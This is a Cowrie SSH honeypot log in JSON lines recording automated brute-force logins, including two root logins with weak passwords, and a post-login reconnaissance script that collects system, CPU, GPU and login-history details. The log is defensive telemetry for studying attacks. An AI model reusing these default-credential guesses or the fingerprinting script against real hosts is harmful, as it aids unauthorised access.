{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:49.156302Z","src_ip":"83.168.105.65","session":"fde7c20c48d9"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:49.266337Z","src_ip":"83.168.105.65","session":"fde7c20c48d9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:50.304422Z","src_ip":"83.168.105.65","session":"fde7c20c48d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42332,"dst_ip":"1.2.3.4","dst_port":22,"session":"61967d933121","protocol":"ssh","message":"New connection: 212.227.125.160:42332 (1.2.3.4:22) [session: 61967d933121]","sensor":"my-vps","timestamp":"2025-08-26T11:56:51.278274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:51.279155Z","src_ip":"212.227.125.160","session":"61967d933121"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:51.338042Z","src_ip":"212.227.125.160","session":"61967d933121"}
{"eventid":"cowrie.login.failed","username":"emqx","password":"emqx","message":"login attempt [emqx/emqx] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:51.513323Z","src_ip":"212.227.125.160","session":"61967d933121"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:52.598869Z","src_ip":"212.227.125.160","session":"61967d933121"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37608,"dst_ip":"1.2.3.4","dst_port":22,"session":"3af4335d5a92","protocol":"ssh","message":"New connection: 196.251.86.249:37608 (1.2.3.4:22) [session: 3af4335d5a92]","sensor":"my-vps","timestamp":"2025-08-26T11:56:57.157177Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43102,"dst_ip":"1.2.3.4","dst_port":22,"session":"929400721b2d","protocol":"ssh","message":"New connection: 212.227.125.160:43102 (1.2.3.4:22) [session: 929400721b2d]","sensor":"my-vps","timestamp":"2025-08-26T11:56:57.275567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:57.341492Z","src_ip":"212.227.125.160","session":"929400721b2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:57.342312Z","src_ip":"212.227.125.160","session":"929400721b2d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:57.724784Z","src_ip":"196.251.86.249","session":"3af4335d5a92"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:56:57.806621Z","src_ip":"196.251.86.249","session":"3af4335d5a92"}
{"eventid":"cowrie.login.failed","username":"manager","password":"manager","message":"login attempt [manager/manager] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:58.027793Z","src_ip":"212.227.125.160","session":"929400721b2d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:59.091194Z","src_ip":"212.227.125.160","session":"929400721b2d"}
{"eventid":"cowrie.login.failed","username":"git","password":"123qwe","message":"login attempt [git/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:59.795245Z","src_ip":"196.251.86.249","session":"3af4335d5a92"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:01.525019Z","src_ip":"196.251.86.249","session":"3af4335d5a92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43872,"dst_ip":"1.2.3.4","dst_port":22,"session":"76c4bda0572c","protocol":"ssh","message":"New connection: 212.227.125.160:43872 (1.2.3.4:22) [session: 76c4bda0572c]","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.530628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.532774Z","src_ip":"212.227.125.160","session":"76c4bda0572c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.589401Z","src_ip":"212.227.125.160","session":"76c4bda0572c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50362,"dst_ip":"1.2.3.4","dst_port":22,"session":"7657206a9491","protocol":"ssh","message":"New connection: 83.168.105.65:50362 (1.2.3.4:22) [session: 7657206a9491]","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.776456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.777099Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.812753Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.login.failed","username":"amir","password":"amir","message":"login attempt [amir/amir] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.944839Z","src_ip":"212.227.125.160","session":"76c4bda0572c"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:57:04.999275Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:57:05.128052Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:57:05.128868Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:05.165651Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:05.166815Z","src_ip":"83.168.105.65","session":"7657206a9491"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:06.054081Z","src_ip":"212.227.125.160","session":"76c4bda0572c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59556,"dst_ip":"1.2.3.4","dst_port":22,"session":"eafa10632a1e","protocol":"ssh","message":"New connection: 212.227.235.229:59556 (1.2.3.4:22) [session: eafa10632a1e]","sensor":"my-vps","timestamp":"2025-08-26T11:57:06.888799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:07.022584Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:57:07.023340Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.359696Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:57:08.942649Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.943373Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.944061Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.945103Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.946162Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.946995Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.947741Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.948446Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.949024Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.949403Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.949750Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.950156Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:57:08.950492Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:57:09.232227Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:09.233136Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:09.234654Z","src_ip":"212.227.235.229","session":"eafa10632a1e"}
